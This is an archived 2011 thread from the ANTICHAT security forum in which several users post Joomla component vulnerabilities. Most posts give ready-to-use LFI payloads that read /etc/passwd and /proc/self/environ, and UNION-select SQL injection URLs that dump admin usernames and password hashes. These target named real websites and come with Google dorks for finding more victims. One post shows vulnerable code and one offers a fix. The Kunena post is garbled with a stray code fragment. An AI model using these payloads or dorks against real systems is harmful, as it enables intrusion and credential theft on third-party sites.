ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

09.04.2011, 14:32
|
|
Guest
Сообщений: n/a
Провел на форуме: 1941
Репутация:
0
|
|
(com_jce) BLIND sql injection vulnerability
Description:
JCE makes creating and editing Joomla!®
content easy Add a set of tools to your Joomla!® environment that give you the power to create the kind of content you want,
without limitations, and without needing to know or learn HTML, XHTML, CSS...
exploit & p0c
[!] index.php?option=com_jce&Itemid=[valid Itemid]
Example p0c
[!] http://host/index.php?option=com_jce&Itemid=8
|
|
|
|

10.04.2011, 16:39
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
LFI in Joomla component com_immobilien
Доброго времени суток, уважаемые форумчане.
Тип: LFI
Компонент: com_immobilien
Версия: Не знаю, тк шелл не залил
Найдена: 10.04.2011 by z0mbyak
Dork: inurl:"com_immobilien"
Vuln Code: Не искал)))
Link:
index.php?option=com_immobilien&controller=
Exploit:
../../../../../../../../../../../etc/passwd%00
PoC:
http://www.sundz-immobilien.de/index.php?option=com_immobilien&controller=../../../CREDITS.php%00
http://www.szaboimmobilien.de/index.php?option=com_immobilien&controller=../../../../../../../../../../../proc/self/environ%00
P.S Вроде не боян)
|
|
|

10.04.2011, 23:54
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Multiple Vulnerabilities in Jomla Component com_tender
И снова здравствуйте)
Тип: LFI
exploit: ../../../../../../../../../../etc/passwd%00
PoC:
http://www.moscow-tenders.ru/index.php?option=com_tender&controller=../../../../../../../../../../etc/passwd%00
Тип: Sql Inj
Вообще, массового я так и не нашел, но компонент очень дырявый)
PoC:
http://irp.omsk.info/index.php?option=com_tender&view=list&filter_type= category&filter_category%5B%5D=327&Itemid=5&comple ted=-1+union+select+1,2,3,4,5,concat(username,0x3a,pass word,0x3a,usertype),7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36+from+jos_users+where+usertype='Super%20Admi nistrator'--
https://www.itbidding.com/index.php?option=com_tender&act=opening_tender&act ion=edit_opening_tender&gov_tender_id=-26+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13--
P.S. Надеюсь не баян)))
|
|
|

20.04.2011, 12:56
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
SQL-Inj in Joomla com_tpjobs
Доброго времени суток, уважаемые форумчане.
В данном компоненте уже находили BSQL-Inj
(http://www.exploit-db.com/exploits/10950)
Но есть и по проще варианты)
Например:
уязвимость в параметре id, при task=detailjob
Код:
Код:
Code:
//detailJob
function detailJob($option){
global $mainframe;
$user =& JFactory::getUser();
$id = JRequest::getVar('id', 0, 'get', 'string');
if(empty($id))
{
$return = JRoute::_('index.php?option=com_tpjobs');
$mainframe->redirect( $return );
}
$db = & JFactory::getDBO();
$query = "select a.*,comp_name,degree_level,pos_type,type_salary,g.country,i.industry,e.exp_name from #__tpjobs_job a".
" LEFT JOIN #__tpjobs_degree_level b ON a.id_degree_level = b.id".
" LEFT JOIN #__tpjobs_pos_type c ON a.id_pos_type = c.id".
" LEFT JOIN #__tpjobs_type_salary d ON a.id_salary_type = d.id".
" LEFT JOIN #__tpjobs_job_exp e ON a.id_job_exp = e.id".
" LEFT JOIN #__tpjobs_job_spec f ON a.id_job_spec = f.id".
" LEFT JOIN #__tpjobs_country g ON a.id_country = g.id".
" LEFT JOIN #__tpjobs_employer h ON a.employer_id = h.user_id".
" LEFT JOIN #__tpjobs_industry i ON h.id_industry = i.id".
" where a.id = ".$id;
$db->setQuery( $query);
$data = $db->loadObjectList();
if(!count($data))
{
$return = JRoute::_('index.php?option=com_tpjobs');
$mainframe->redirect( $return );
}
HTML_front_tpjobs::detailJob($data,$option);
}
В итоге нам нужно только подобрать кол-во колонок через order+by (за частую ~20-30)
POC:
http://bankihr.by/index.php?option=com_tpjobs&task=detailjob&id=1+un ion+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16, 17,18,19,20,21,22,23,24,25,26,27,28,29,30--
http://www.ingenjorstorget.se/index.php?option=com_tpjobs&task=detailjob&id=9999 99999999+union+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,group_concat%28username,0x3a,password,0x3a,usert ype%29,15,16,17,18,19,20,21,22,23,24,25+from+jos_u sers--
|
|
|

21.04.2011, 17:43
|
|
Guest
Сообщений: n/a
Провел на форуме: 2301
Репутация:
10
|
|
Joomnik Sql Injection:
- Need: Maqic_Quotes = Off
- /index.php
- http://localhost/index.php?option=com_joomnik&album=9' and 1!=1 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9, 10,11,12,13 from jos_users where gid=25 limit 0,1-- 1
|
|
|
|

28.04.2011, 17:41
|
|
Guest
Сообщений: n/a
Провел на форуме: 30555
Репутация:
85
|
|
Kunena Forum
Активная XSS
Уязвимый компонент: Kunena Forum, версии JS
[/QUOTE]
" if author else f"
Dork: inurl:/index.php/component/kunena
Автор: eclipse
|
|
|
|

02.06.2011, 14:07
|
|
Guest
Сообщений: n/a
Провел на форуме: 30555
Репутация:
85
|
|
juser_bestbefore
Раскрытие путейпри обращении к скрипту juser_bestbefore.php
Причина:
Отсутствует инициализация глобальной переменной $maingrame, в следствии чего возникает фатальная ошибка
Код:
Code:
Call to a member function isAdmin() on a non-object in
код содержащий ошибку
Код:
Code:
function onAfterInitialise() { // latest user log-in details have been updated at this stage
global $mainframe;
// Not for admin backend
if ($mainframe->isAdmin()) {
return;
}
...
}
Исправление:
Перед использованием добавить инициализацию переменной
Код:
Code:
$mainframe = JFactory::getApplication();
Автор: eclipse
|
|
|
|

14.06.2011, 00:26
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
SQl-Inj в компоненте com_prywatne
Тип: Sql-Inj
Модуль: com_prywatne
Dork: inurl:"index.php?option=com_prywatne"
Данный компонент установлен только на одном сайте, но мало ли вдруг пригодится.
Exploit:
+union+select+group_concat(username,0x3a,password, 0x3a,usertype)+from+jos_users--
PoC:
http://infomedic.mentax.pl/old_site/index.php?option=com_prywatne&sid=30&mid=0&pid=34+ union+select+group_concat(username,0x3a,password,0 x3a,usertype)+from+jos_users--
|
|
|

23.06.2011, 01:56
|
|
Познающий
Регистрация: 10.04.2010
Сообщений: 49
Провел на форуме: 168709
Репутация:
1
|
|
Joomla com_com_propiedades Multiple
# Exploit Title: Joomla com_com_propiedades Multiple Vulnerabilities
# Date: 23.06.2011
# Author: z0mbyak
# Vendor or Software Link: find by yourself
# Version: Don't know
# Category: [remote, webapps.]
# Google dork: inurl:"index.php?option=com_propiedades"
# Tested on: FreeBSD
LFI Vulnerability:
exploit: ../../../../../../../../../../../../etc/passwd%00
VulnSite: http://www.arifmetika.com.ua/index.php?option=com_propiedades&controller=../../../../../../../../../../../etc/passwd%00
SQL-Inj Vulnerability:
exploit: null+union+select+1,2,3,4,5,6,7,88,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,277,28,29,30 ,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29,30,61,62,63,64--&id_ciudad=4&id_sector=0
VulnSite: http://www.diplomat-kurgan.ru/index.php?option=com_propiedades&task=search&id_pr ovincia=null+union+select+1,2,3,4,5,6,7,88,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,277, 28,29,30,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,61,62,63,6 4--&id_ciudad=4&id_sector=0
P.S. Вообще инъекцию я крутил через пост, так как поиск на аяксе, но специально для особо ленивых размещаю гет)
Специально для forum.antichat.ru и rdot.org/forum/
z0mbyak.
|
|
|

02.07.2011, 09:27
|
|
Новичок
Регистрация: 01.11.2008
Сообщений: 0
Провел на форуме: 13329
Репутация:
0
|
|
Joomla mdigg Component SQL Injection Vulnerability
Сообщение от None
================================================== ===================
.__ .__ __ .__ .___
____ ___ _________ | | ____ |__|/ |_ |__| __| _/
_/ __ \\ \/ /\____ \| | / _ \| \ __\ ______ | |/ __ |
\ ___/ > > |_( ) || | /_____/ | / /_/ |
\___ >__/\_ \| __/|____/\____/|__||__| |__\____ |
\/ \/|__| \/
Exploit-ID is the Exploit Information Disclosure
Web : exploit-id.com
e-mail : root[at]exploit-id[dot]com
#########################################
I'm Caddy-Dz, member of Exploit-Id
#########################################
================================================== ====================
####
# Exploit Title: joomla component SQL Injection Vulnerability
# Author: Caddy-Dz
# Facebook Page: www.facebook.com/islam.caddy
# E-mail: islam_babia[at]hotmail.com | Caddy-Dz[at]exploit-id.com
# Website: www.exploit-id.com
# Google Dork: "Powered by joomla" inurl:link_id
# Category:: Webapps
# Tested on: [Windows Vista Edition Intégral- French]
# http://demo15.joomlaapps.com/
# http://demo15.joomlaapps.com/mdigg.html
####[*] ExpLo!T :
http://127.0.0.1/?act=story_lists&task=item&link_id=1'
http://127.0.0.1/?act=story_lists&task=item&link_id=[SQLi]
http://127.0.0.1/path/?act=story_lists&task=item&link_id=[SQLi]
####
[+] Peace From Algeria
####
=================================**Algerians Hackers**=======================================|
# Greets To : |
KedAns-Dz , Kalashinkov3 & **All Algerians Hackers** , jos_ali_joe , Z190T , |
All Exploit-Id Team , (exploit-id.com) , (1337day.com) , (dis9.com) , (exploit-db.com) |
All My Friends: T!riRou , ChoK0 , MeRdaw! , CaRras0 , StiffLer , MaaTar , St0fa , Nissou , |
RmZ ...others |
================================================== ========================================== |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|